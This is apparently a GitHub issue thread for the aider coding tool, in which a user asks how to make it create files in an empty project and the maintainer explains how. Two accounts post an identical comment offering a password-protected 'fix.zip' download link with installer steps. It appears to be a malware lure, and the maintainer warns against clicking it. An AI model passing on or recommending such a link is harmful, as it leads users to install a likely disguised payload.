### ISSUE TITLE
[Question] How do I get it to create the file if I'm creating my own website?

### ISSUE THREAD

**Issue by automataIA** [paul-gauthier/aider#1185]
### Issue

 How do I get it to create the file if I'm creating my own website?
cost: 
1. I'm using su aider with deepseek API: `aider --deepseek`
2. I'm inside the root of my empty project (without files and without folders)

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paul-gauthier** [comment]
You should probably NOT click on the link in the last comment.

Thanks for trying aider and filing this issue. This doc may be helpful:

https://aider.chat/docs/usage.html

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paul-gauthier** [comment]
Tell it something like "make me a webpage with X on it" and it will make a file. Or you can do `/add newfilename.ext` and aider will add one.

**Comment by paul-gauthier** [comment]
Ya, deepseek isn't nearly as capable a model as Sonnet unfortunately.

I'm going to close this issue for now, but feel free to add a comment here and I will re-open or file a new issue any time.
